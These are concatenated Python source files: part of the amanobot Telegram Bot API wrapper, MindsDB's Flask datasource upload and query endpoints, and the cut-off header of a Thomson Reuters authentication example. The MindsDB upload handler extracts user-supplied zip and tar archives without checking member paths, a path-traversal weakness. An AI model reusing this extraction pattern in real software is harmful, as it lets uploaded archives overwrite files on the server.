is_anonymous=None,
type=None,
allows_multiple_answers=None,
correct_option_id=None,
explanation=None,
explanation_parse_mode: str = None,
open_period=None,
is_closed=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendpoll """
p = _strip(locals())
return self._api_request('sendPoll', _rectify(p))
def sendDice(self, chat_id: Union[int, str],
emoji=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#senddice """
p = _strip(locals())
return self._api_request('sendDice', _rectify(p))
def sendGame(self, chat_id: Union[int, str], game_short_name,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendgame """
p = _strip(locals())
return self._api_request('sendGame', _rectify(p))
def sendInvoice(self, chat_id: Union[int, str], title, description, payload,
provider_token, start_parameter, currency, prices,
provider_data=None,
photo_url=None,
photo_size=None,
photo_width=None,
photo_height=None,
need_name=None,
need_phone_number=None,
need_email=None,
need_shipping_address=None,
is_flexible=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendinvoice """
p = _strip(locals())
return self._api_request('sendInvoice', _rectify(p))
def sendChatAction(self, chat_id: Union[int, str], action):
""" See: https://core.telegram.org/bots/api#sendchataction """
p = _strip(locals())
return self._api_request('sendChatAction', _rectify(p))
def getUserProfilePhotos(self, user_id,
offset=None,
limit=None):
""" See: https://core.telegram.org/bots/api#getuserprofilephotos """
p = _strip(locals())
return self._api_request('getUserProfilePhotos', _rectify(p))
def getFile(self, file_id):
""" See: https://core.telegram.org/bots/api#getfile """
p = _strip(locals())
return self._api_request('getFile', _rectify(p))
def kickChatMember(self, chat_id: Union[int, str], user_id,
until_date=None):
""" See: https://core.telegram.org/bots/api#kickchatmember """
p = _strip(locals())
return self._api_request('kickChatMember', _rectify(p))
def unbanChatMember(self, chat_id: Union[int, str], user_id,
only_if_banned=None):
""" See: https://core.telegram.org/bots/api#unbanchatmember """
p = _strip(locals())
return self._api_request('unbanChatMember', _rectify(p))
def restrictChatMember(self, chat_id: Union[int, str], user_id,
until_date=None,
can_send_messages=None,
can_send_media_messages=None,
can_send_polls=None,
can_send_other_messages=None,
can_add_web_page_previews=None,
can_change_info=None,
can_invite_users=None,
can_pin_messages=None,
permissions=None):
""" See: https://core.telegram.org/bots/api#restrictchatmember """
if not isinstance(permissions, dict):
permissions = dict(can_send_messages=can_send_messages,
can_send_media_messages=can_send_media_messages,
can_send_polls=can_send_polls,
can_send_other_messages=can_send_other_messages,
can_add_web_page_previews=can_add_web_page_previews,
can_change_info=can_change_info,
can_invite_users=can_invite_users,
can_pin_messages=can_pin_messages)
p = _strip(locals())
return self._api_request('restrictChatMember', _rectify(p))
def promoteChatMember(self, chat_id: Union[int, str], user_id,
can_change_info=None,
can_post_messages=None,
can_edit_messages=None,
can_delete_messages=None,
can_invite_users=None,
can_restrict_members=None,
can_pin_messages=None,
can_promote_members=None):
""" See: https://core.telegram.org/bots/api#promotechatmember """
p = _strip(locals())
return self._api_request('promoteChatMember', _rectify(p))
def setChatAdministratorCustomTitle(self, chat_id: Union[int, str], user_id,
custom_title):
""" See: https://core.telegram.org/bots/api#setchatadministratorcustomtitle """
p = _strip(locals())
return self._api_request('setChatAdministratorCustomTitle', _rectify(p))
def setChatPermissions(self, chat_id: Union[int, str],
can_send_messages=None,
can_send_media_messages=None,
can_send_polls=None,
can_send_other_messages=None,
can_add_web_page_previews=None,
can_change_info=None,
can_invite_users=None,
can_pin_messages=None,
permissions=None):
""" See: https://core.telegram.org/bots/api#setchatpermissions """
if not isinstance(permissions, dict):
permissions = dict(can_send_messages=can_send_messages,
can_send_media_messages=can_send_media_messages,
can_send_polls=can_send_polls,
can_send_other_messages=can_send_other_messages,
can_add_web_page_previews=can_add_web_page_previews,
can_change_info=can_change_info,
can_invite_users=can_invite_users,
can_pin_messages=can_pin_messages)
p = _strip(locals())
return self._api_request('setChatPermissions', _rectify(p))
def exportChatInviteLink(self, chat_id):
""" See: https://core.telegram.org/bots/api#exportchatinvitelink """
p = _strip(locals())
return self._api_request('exportChatInviteLink', _rectify(p))
def setChatPhoto(self, chat_id: Union[int, str], photo):
""" See: https://core.telegram.org/bots/api#setchatphoto """
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('setChatPhoto', _rectify(p), {'photo': photo})
def deleteChatPhoto(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatphoto """
p = _strip(locals())
return self._api_request('deleteChatPhoto', _rectify(p))
def setChatTitle(self, chat_id: Union[int, str], title):
""" See: https://core.telegram.org/bots/api#setchattitle """
p = _strip(locals())
return self._api_request('setChatTitle', _rectify(p))
def setChatDescription(self, chat_id: Union[int, str],
description=None):
""" See: https://core.telegram.org/bots/api#setchatdescription """
p = _strip(locals())
return self._api_request('setChatDescription', _rectify(p))
def pinChatMessage(self, chat_id: Union[int, str], message_id: int,
disable_notification: bool = None):
""" See: https://core.telegram.org/bots/api#pinchatmessage """
p = _strip(locals())
return self._api_request('pinChatMessage', _rectify(p))
def unpinChatMessage(self, chat_id: Union[int, str],
message_id=None):
""" See: https://core.telegram.org/bots/api#unpinchatmessage """
p = _strip(locals())
return self._api_request('unpinChatMessage', _rectify(p))
def unpinAllChatMessages(self, chat_id):
""" See: https://core.telegram.org/bots/api#unpinallchatmessages """
p = _strip(locals())
return self._api_request('unpinAllChatMessages', _rectify(p))
def leaveChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#leavechat """
p = _strip(locals())
return self._api_request('leaveChat', _rectify(p))
def getChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchat """
p = _strip(locals())
return self._api_request('getChat', _rectify(p))
def getChatAdministrators(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatadministrators """
p = _strip(locals())
return self._api_request('getChatAdministrators', _rectify(p))
def getChatMembersCount(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatmemberscount """
p = _strip(locals())
return self._api_request('getChatMembersCount', _rectify(p))
def getChatMember(self, chat_id: Union[int, str], user_id):
""" See: https://core.telegram.org/bots/api#getchatmember """
p = _strip(locals())
return self._api_request('getChatMember', _rectify(p))
def setChatStickerSet(self, chat_id: Union[int, str], sticker_set_name):
""" See: https://core.telegram.org/bots/api#setchatstickerset """
p = _strip(locals())
return self._api_request('setChatStickerSet', _rectify(p))
def deleteChatStickerSet(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatstickerset """
p = _strip(locals())
return self._api_request('deleteChatStickerSet', _rectify(p))
def answerCallbackQuery(self, callback_query_id,
text=None,
show_alert=None,
url=None,
cache_time=None):
""" See: https://core.telegram.org/bots/api#answercallbackquery """
p = _strip(locals())
return self._api_request('answerCallbackQuery', _rectify(p))
def setMyCommands(self, commands=[]):
""" See: https://core.telegram.org/bots/api#setmycommands """
p = _strip(locals())
return self._api_request('setMyCommands', _rectify(p))
def getMyCommands(self):
""" See: https://core.telegram.org/bots/api#getmycommands """
return self._api_request('getMyCommands')
def setPassportDataErrors(self, user_id, errors):
""" See: https://core.telegram.org/bots/api#setpassportdataerrors """
p = _strip(locals())
return self._api_request('setPassportDataErrors', _rectify(p))
def answerPreCheckoutQuery(self, pre_checkout_query_id, ok,
error_message=None):
""" See: https://core.telegram.org/bots/api#answerprecheckoutquery """
p = _strip(locals())
return self._api_request('answerPreCheckoutQuery', _rectify(p))
def editMessageText(self, msg_identifier, text: str,
parse_mode: str = None,
entities=None,
disable_web_page_preview: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagetext
:param msg_identifier:
a 2-tuple (``chat_id``, ``message_id``),
a 1-tuple (``inline_message_id``),
or simply ``inline_message_id``.
You may extract this value easily with :meth:`amanobot.message_identifier`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageText', _rectify(p))
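# Illustrative sketch (not part of the original source): the msg_identifier forms
# accepted above, with hypothetical ids.
#
#   sent = bot.sendMessage(chat_id, 'original')
#   bot.editMessageText(message_identifier(sent), 'edited')     # (chat_id, message_id) tuple
#   bot.editMessageText('4242424242', 'edited inline message')  # bare inline_message_id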
def editMessageCaption(self, msg_identifier,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagecaption
:param msg_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageCaption', _rectify(p))
def editMessageMedia(self, msg_identifier, media,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagemedia
:param msg_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier', 'media'])
p.update(_dismantle_message_identifier(msg_identifier))
legal_media, files_to_attach = _split_input_media_array([media])
p['media'] = legal_media[0]
return self._api_request('editMessageMedia', _rectify(p), files_to_attach)
def editMessageReplyMarkup(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagereplymarkup
:param msg_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageReplyMarkup', _rectify(p))
def stopPoll(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#stoppoll
:param msg_identifier:
a 2-tuple (``chat_id``, ``message_id``).
You may extract this value easily with :meth:`amanobot.message_identifier`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('stopPoll', _rectify(p))
def deleteMessage(self, msg_identifier):
"""
See: https://core.telegram.org/bots/api#deletemessage
:param msg_identifier:
Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`,
except this method does not work on inline messages.
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('deleteMessage', _rectify(p))
def sendSticker(self, chat_id: Union[int, str], sticker,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendsticker
:param sticker: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['sticker'])
return self._api_request_with_file('sendSticker', _rectify(p), {'sticker': sticker})
def getStickerSet(self, name):
"""
See: https://core.telegram.org/bots/api#getstickerset
"""
p = _strip(locals())
return self._api_request('getStickerSet', _rectify(p))
def uploadStickerFile(self, user_id, png_sticker):
"""
See: https://core.telegram.org/bots/api#uploadstickerfile
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('uploadStickerFile', _rectify(p), {'png_sticker': png_sticker})
def createNewStickerSet(self, user_id, name, title, emojis,
png_sticker=None,
tgs_sticker=None,
contains_masks=None,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#createnewstickerset
"""
p = _strip(locals(), more=['png_sticker', 'tgs_sticker'])
return self._api_request_with_file('createNewStickerSet', _rectify(p),
{'png_sticker': png_sticker, 'tgs_sticker': tgs_sticker})
def addStickerToSet(self, user_id, name, emojis,
png_sticker=None,
tgs_sticker=None,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#addstickertoset
"""
p = _strip(locals(), more=['png_sticker', 'tgs_sticker'])
return self._api_request_with_file('addStickerToSet', _rectify(p),
{'png_sticker': png_sticker, 'tgs_sticker': tgs_sticker})
def setStickerPositionInSet(self, sticker, position):
"""
See: https://core.telegram.org/bots/api#setstickerpositioninset
"""
p = _strip(locals())
return self._api_request('setStickerPositionInSet', _rectify(p))
def deleteStickerFromSet(self, sticker):
"""
See: https://core.telegram.org/bots/api#deletestickerfromset
"""
p = _strip(locals())
return self._api_request('deleteStickerFromSet', _rectify(p))
def setStickerSetThumb(self, name, user_id,
thumb=None):
"""
See: https://core.telegram.org/bots/api#setstickersetthumb
"""
p = _strip(locals(), more=['thumb'])
return self._api_request_with_file('setStickerSetThumb', _rectify(p), {'thumb': thumb})
def answerInlineQuery(self, inline_query_id, results,
cache_time=None,
is_personal=None,
next_offset=None,
switch_pm_text=None,
switch_pm_parameter=None):
""" See: https://core.telegram.org/bots/api#answerinlinequery """
p = _strip(locals())
return self._api_request('answerInlineQuery', _rectify(p))
def getUpdates(self,
offset=None,
limit=None,
timeout=None,
allowed_updates=None,
_raise_errors=None):
""" See: https://core.telegram.org/bots/api#getupdates """
if _raise_errors is None:
_raise_errors = self._raise_errors
p = _strip(locals())
return self._api_request('getUpdates', _rectify(p), raise_errors=_raise_errors)
def setWebhook(self,
url=None,
certificate=None,
ip_address=None,
max_connections=None,
allowed_updates=None,
drop_pending_updates=None):
""" See: https://core.telegram.org/bots/api#setwebhook """
p = _strip(locals(), more=['certificate'])
if certificate:
files = {'certificate': certificate}
return self._api_request('setWebhook', _rectify(p), files)
return self._api_request('setWebhook', _rectify(p))
def deleteWebhook(self,
drop_pending_updates=None):
""" See: https://core.telegram.org/bots/api#deletewebhook """
p = _strip(locals())
return self._api_request('deleteWebhook', _rectify(p))
def getWebhookInfo(self):
""" See: https://core.telegram.org/bots/api#getwebhookinfo """
return self._api_request('getWebhookInfo')
def setGameScore(self, user_id, score, game_message_identifier,
force=None,
disable_edit_message=None):
"""
See: https://core.telegram.org/bots/api#setgamescore
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('setGameScore', _rectify(p))
def getGameHighScores(self, user_id, game_message_identifier):
"""
See: https://core.telegram.org/bots/api#getgamehighscores
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('getGameHighScores', _rectify(p))
def download_file(self, file_id, dest):
"""
Download a file to local disk.
:param dest: a path or a ``file`` object
"""
f = self.getFile(file_id)
try:
d = dest if _isfile(dest) else open(dest, 'wb')
r = api.download((self._base_url, self._token, f['file_path']), preload_content=False)
while 1:
data = r.read(self._file_chunk_size)
if not data:
break
d.write(data)
finally:
if not _isfile(dest) and 'd' in locals():
d.close()
if 'r' in locals():
r.release_conn()
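# Illustrative usage sketch (not part of the original module; 'bot' and 'msg' are
# assumed to come from the surrounding application code):
#
#     file_id = msg['photo'][-1]['file_id']      # largest PhotoSize of a photo message
#     bot.download_file(file_id, 'photo.jpg')    # dest given as a path
#     with open('photo2.jpg', 'wb') as f:
#         bot.download_file(file_id, f)          # dest given as a file object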
def message_loop(self, callback=None, relax=0.1,
timeout=20, allowed_updates=None,
source=None, ordered=True, maxhold=3,
run_forever=False):
"""
:deprecated: will be removed in future. Use :class:`.MessageLoop` instead.
Spawn a thread to constantly ``getUpdates`` or pull updates from a queue.
Apply ``callback`` to every message received. Also starts the scheduler thread
for internal events.
:param callback:
a function that takes one argument (the message), or a routing table.
If ``None``, the bot's ``handle`` method is used.
A *routing table* is a dictionary of ``{flavor: function}``, mapping messages to appropriate
handler functions according to their flavors. It allows you to define functions specifically
to handle one flavor of messages. It usually looks like this: ``{'chat': fn1,
'callback_query': fn2, 'inline_query': fn3, ...}``. Each handler function should take
one argument (the message).
:param source:
Source of updates.
If ``None``, ``getUpdates`` is used to obtain new messages from Telegram servers.
If it is a synchronized queue, new messages are pulled from the queue.
A web application implementing a webhook can dump updates into the queue,
while the bot pulls from it. This is how amanobot can be integrated with webhooks.
Acceptable contents in queue:
- ``str`` or ``bytes`` (decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
When ``source`` is ``None``, these parameters are meaningful:
:type relax: float
:param relax: seconds between each ``getUpdates``
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`amanobot.Bot.getUpdates`,
controlling how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`amanobot.Bot.getUpdates`,
controlling which types of updates to receive.
When ``source`` is a queue, these parameters are meaningful:
:type ordered: bool
:param ordered:
If ``True``, ensure in-order delivery of messages to ``callback``
(i.e. updates with a smaller ``update_id`` always come before those with
a larger ``update_id``).
If ``False``, no re-ordering is done. ``callback`` is applied to messages
as soon as they are pulled from queue.
:type maxhold: float
:param maxhold:
Applied only when ``ordered`` is ``True``. The maximum number of seconds
an update is held waiting for a not-yet-arrived smaller ``update_id``.
When this number of seconds is up, the update is delivered to ``callback``
even if some smaller ``update_id``\s have not yet arrived. If those smaller
``update_id``\s arrive at some later time, they are discarded.
Finally, this parameter is always meaningful:
:type run_forever: bool or str
:param run_forever:
If ``True`` or any non-empty string, append an infinite loop at the end of
this method, so it never returns. Useful as the very last line in a program.
A non-empty string will also be printed, useful as an indication that the
program is listening.
"""
if callback is None:
callback = self.handle
elif isinstance(callback, dict):
callback = flavor_router(callback)
collect_queue = queue.Queue()
def collector():
while 1:
try:
item = collect_queue.get(block=True)
callback(item)
except:
# Localize error so thread can keep going.
traceback.print_exc()
def relay_to_collector(update):
key = _find_first_key(update, ['message',
'edited_message',
'poll',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query'])
collect_queue.put(update[key])
return update['update_id']
def get_from_telegram_server():
offset = None # running offset
allowed_upd = allowed_updates
while 1:
try:
result = self.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_upd,
_raise_errors=True)
# Once passed, this parameter is no longer needed.
allowed_upd = None
if len(result) > 0:
# No sort. Trust server to give messages in correct order.
# Update offset to max(update_id) + 1
offset = max([relay_to_collector(update) for update in result]) + 1
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def dictify(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
if type(data) is str:
return json.loads(data)
if type(data) is dict:
return data
raise ValueError()
def get_from_queue_unordered(qu):
while 1:
try:
data = qu.get(block=True)
update = dictify(data)
relay_to_collector(update)
except:
traceback.print_exc()
def get_from_queue(qu):
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
data = qu.get(block=True, timeout=qwait)
update = dictify(data)
if max_id is None:
# First message received, handle regardless.
max_id = relay_to_collector(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = relay_to_collector(update)
# clear contiguous updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(
buffer.popleft()) # updates that arrived earlier, handle them.
else:
break # gap, no more contiguous updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
# Update arrives prematurely, insert into buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id'] - max_id - 1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
qwait = max(qwait, 0)
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
collector_thread = threading.Thread(target=collector)
collector_thread.daemon = True
collector_thread.start()
if source is None:
message_thread = threading.Thread(target=get_from_telegram_server)
elif isinstance(source, queue.Queue):
if ordered:
message_thread = threading.Thread(target=get_from_queue, args=(source,))
else:
message_thread = threading.Thread(target=get_from_queue_unordered, args=(source,))
else:
raise ValueError('Invalid source')
message_thread.daemon = True # need this for main thread to be killable by Ctrl-C
message_thread.start()
self._scheduler.on_event(collect_queue.put)
self._scheduler.run_as_thread()
if run_forever:
if _isstring(run_forever):
print(run_forever)
while 1:
time.sleep(10)
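# Minimal webhook-integration sketch (an assumption, not part of the original module):
# a web app dumps raw update JSON into a queue, and message_loop consumes it through
# the ``source`` parameter. The Flask app and route name below are hypothetical.
#
#     update_queue = queue.Queue()
#     bot.message_loop(handle, source=update_queue)
#
#     @app.route('/webhook', methods=['POST'])
#     def webhook():
#         update_queue.put(request.get_data())  # str/bytes of a JSON-serialized Update
#         return 'OK'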
class SpeakerBot(Bot):
def __init__(self, token):
super(SpeakerBot, self).__init__(token)
self._mic = helper.Microphone()
@property
def mic(self):
return self._mic
def create_listener(self):
q = queue.Queue()
self._mic.add(q)
ln = helper.Listener(self._mic, q)
return ln
class DelegatorBot(SpeakerBot):
def __init__(self, token, delegation_patterns):
"""
:param delegation_patterns: a list of (seeder, delegator) tuples.
"""
super(DelegatorBot, self).__init__(token)
self._delegate_records = [p + ({},) for p in delegation_patterns]
@staticmethod
def _startable(delegate):
return ((hasattr(delegate, 'start') and inspect.ismethod(delegate.start)) and
(hasattr(delegate, 'is_alive') and inspect.ismethod(delegate.is_alive)))
@staticmethod
def _tuple_is_valid(t):
return len(t) == 3 and callable(t[0]) and type(t[1]) in [list, tuple] and type(t[2]) is dict
def _ensure_startable(self, delegate):
if self._startable(delegate):
return delegate
if callable(delegate):
return threading.Thread(target=delegate)
if type(delegate) is tuple and self._tuple_is_valid(delegate):
func, args, kwargs = delegate
return threading.Thread(target=func, args=args, kwargs=kwargs)
raise RuntimeError(
'Delegate does not have the required methods, is not callable, and is not a valid tuple.')
def handle(self, msg):
self._mic.send(msg)
for calculate_seed, make_delegate, registry in self._delegate_records:
seed = calculate_seed(msg)
if seed is None:
continue
elif isinstance(seed, collections.abc.Hashable):  # collections.Hashable was removed in Python 3.10
if seed not in registry or not registry[seed].is_alive():
d = make_delegate((self, msg, seed))
d = self._ensure_startable(d)
registry[seed] = d
registry[seed].start()
else:
d = make_delegate((self, msg, seed))
d = self._ensure_startable(d)
d.start()
|
datasource.py
|
import os
import threading
import tempfile
import re
import multipart
import zipfile
import tarfile
import shutil
from pathlib import Path
import mysql.connector
from flask import request, send_file
from flask_restx import Resource, abort  # 'abort' is used to return errors as JSON: {'message': 'error text'}
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import log
from mindsdb.api.http.utils import http_error
from mindsdb.api.http.namespaces.configs.datasources import ns_conf
from mindsdb.api.http.namespaces.entitites.datasources.datasource import (
put_datasource_params
)
from mindsdb.api.http.namespaces.entitites.datasources.datasource_data import (
get_datasource_rows_params
)
def parse_filter(key, value):
result = re.search(r'filter(_*.*)\[(.*)\]', key)
operator = result.groups()[0].strip('_') or 'like'
field = result.groups()[1]
operators_map = {
'like': 'like',
'in': 'in',
'nin': 'not in',
'gt': '>',
'lt': '<',
'gte': '>=',
'lte': '<=',
'eq': '=',
'neq': '!='
}
if operator not in operators_map:
return None
operator = operators_map[operator]
return [field, operator, value]
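# Worked examples (illustrative, derived from the regex and operator map above):
#   parse_filter('filter[name]', 'abc')   -> ['name', 'like', 'abc']
#   parse_filter('filter_gt[age]', '30')  -> ['age', '>', '30']
#   parse_filter('filter_foo[age]', '30') -> None  (unknown operator)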
@ns_conf.route('/')
class DatasourcesList(Resource):
@ns_conf.doc('get_datasources_list')
def get(self):
'''List all datasets'''
return request.default_store.get_datasets()
@ns_conf.route('/<name>')
@ns_conf.param('name', 'Datasource name')
class Datasource(Resource):
@ns_conf.doc('get_datasource')
def get(self, name):
'''return datasource metadata'''
ds = request.default_store.get_datasource(name)
if ds is not None:
return ds
return '', 404
@ns_conf.doc('delete_datasource')
def delete(self, name):
'''delete datasource'''
try:
request.default_store.delete_datasource(name)
except Exception as e:
log.error(e)
return http_error(
400,
"Error deleting datasource",
f"There was an error while tring to delete datasource with name '{name}'"
)
return '', 200
@ns_conf.doc('put_datasource', params=put_datasource_params)
def put(self, name):
'''add new datasource'''
data = {}
def on_field(field):
name = field.field_name.decode()
value = field.value.decode()
data[name] = value
file_object = None
def on_file(file):
nonlocal file_object
data['file'] = file.file_name.decode()
file_object = file.file_object
temp_dir_path = tempfile.mkdtemp(prefix='datasource_file_')
if request.headers['Content-Type'].startswith('multipart/form-data'):
parser = multipart.create_form_parser(
headers=request.headers,
on_field=on_field,
on_file=on_file,
config={
'UPLOAD_DIR': temp_dir_path.encode(), # bytes required
'UPLOAD_KEEP_FILENAME': True,
'UPLOAD_KEEP_EXTENSIONS': True,
'MAX_MEMORY_FILE_SIZE': 0
}
)
while True:
chunk = request.stream.read(8192)
if not chunk:
break
parser.write(chunk)
parser.finalize()
parser.close()
if file_object is not None and not file_object.closed:
file_object.close()
else:
data = request.json
if 'query' in data:
integration_id = request.json['integration_id']
integration = request.integration_controller.get(integration_id)
if integration is None:
abort(400, f"{integration_id} integration doesn't exist")
if integration['type'] == 'mongodb':
data['find'] = data['query']
request.default_store.save_datasource(name, integration_id, data)
os.rmdir(temp_dir_path)
return request.default_store.get_datasource(name)
ds_name = data['name'] if 'name' in data else name
source = data['source'] if 'source' in data else name
source_type = data['source_type']
try:
if source_type == 'file':
file_path = os.path.join(temp_dir_path, data['file'])
lp = file_path.lower()
if lp.endswith(('.zip', '.tar.gz')):
if lp.endswith('.zip'):
with zipfile.ZipFile(file_path) as f:
f.extractall(temp_dir_path)
elif lp.endswith('.tar.gz'):
with tarfile.open(file_path) as f:
f.extractall(temp_dir_path)
os.remove(file_path)
files = os.listdir(temp_dir_path)
if len(files) != 1:
# temp_dir_path is cleaned up by shutil.rmtree in the finally block below
return http_error(400, 'Wrong content.', 'Archive must contain only one data file.')
file_path = os.path.join(temp_dir_path, files[0])
source = files[0]
if not os.path.isfile(file_path):
return http_error(400, 'Wrong content.', 'Archive must contain data file in root.')
# TODO
# request.default_store.save_datasource(ds_name, source_type, source, file_path)
if data['file'] is not None:
file_name = Path(data['file']).name
else:
file_name = Path(file_path).name
file_id = request.default_store.save_file(ds_name, file_path, file_name=file_name)
request.default_store.save_datasource(ds_name, source_type, source={'mindsdb_file_name': name})
else:
file_path = None
request.default_store.save_datasource(ds_name, source_type, source)
except Exception as e:
return http_error(400, 'Error', str(e))
finally:
shutil.rmtree(temp_dir_path)
return request.default_store.get_datasource(ds_name)
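# Hypothetical request sketch (the '/api/datasources' prefix and port are assumptions,
# not confirmed by this file): uploading a CSV as a new datasource via multipart/form-data.
#
#   curl -X PUT http://127.0.0.1:47334/api/datasources/my_ds \
#        -F 'source_type=file' \
#        -F 'file=@my_data.csv'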
def analyzing_thread(name, default_store):
try:
from mindsdb.interfaces.storage.db import session
default_store.start_analysis(name)
session.close()
except Exception as e:
log.error(e)
@ns_conf.route('/<name>/analyze')
@ns_conf.param('name', 'Datasource name')
class Analyze(Resource):
@ns_conf.doc('analyse_dataset')
def get(self, name):
analysis = request.default_store.get_analysis(name)
if analysis is not None:
return analysis, 200
ds = request.default_store.get_datasource(name)
if ds is None:
log.error('No valid datasource given')
abort(400, 'No valid datasource given')
x = threading.Thread(target=analyzing_thread, args=(name, request.default_store))
x.start()
return {'status': 'analyzing'}, 200
@ns_conf.route('/<name>/analyze_refresh')
@ns_conf.param('name', 'Datasource name')
class Analyze2(Resource):
@ns_conf.doc('analyze_refresh_dataset')
def get(self, name):
analysis = request.default_store.get_analysis(name)
if analysis is not None:
return analysis, 200
ds = request.default_store.get_datasource(name)
if ds is None:
log.error('No valid datasource given')
abort(400, 'No valid datasource given')
x = threading.Thread(target=analyzing_thread, args=(name, request.default_store))
x.start()
return {'status': 'analyzing'}, 200
@ns_conf.route('/<name>/data/')
@ns_conf.param('name', 'Datasource name')
class DatasourceData(Resource):
@ns_conf.doc('get_datasource_data', params=get_datasource_rows_params)
def get(self, name):
'''return data rows'''
ds = request.default_store.get_datasource(name)
if ds is None:
abort(400, 'No valid datasource given')
params = {
'page[size]': None,
'page[offset]': None
}
where = []
for key, value in request.args.items():
if key == 'page[size]':
params['page[size]'] = int(value)
if key == 'page[offset]':
params['page[offset]'] = int(value)
elif key.startswith('filter'):
param = parse_filter(key, value)
if param is None:
abort(400, f'Not valid filter "{key}"')
where.append(param)
data_dict = request.default_store.get_data(name, where, params['page[size]'], params['page[offset]'])
return data_dict, 200
@ns_conf.route('/<name>/download')
@ns_conf.param('name', 'Datasource name')
class DatasourceMissedFilesDownload(Resource):
@ns_conf.doc('get_datasource_download')
def get(self, name):
'''download uploaded file'''
ds = request.default_store.get_datasource(name)
if not ds:
abort(404, "{} not found".format(name))
# force download from s3
request.default_store.get_datasource_obj(name)
if not os.path.exists(ds['source']):
abort(404, "{} not found".format(name))
return send_file(os.path.abspath(ds['source']), as_attachment=True)
|
market_price_edpgw_authentication.py
|
#!/usr/bin/env python
#|-----------------------------------------------------------------------------
#| This source code is provided under the Apache 2.0 license --
#| and is provided AS IS with no warranty or guarantee of fit for purpose. --
#| See the project's LICENSE.md for details. --
#| Copyright Thomson Reuters 2018. All rights reserved. --
#|-----------------------------------------------------------------------------
"""
Simple example of authenticating to EDP-GW and using the token to login and
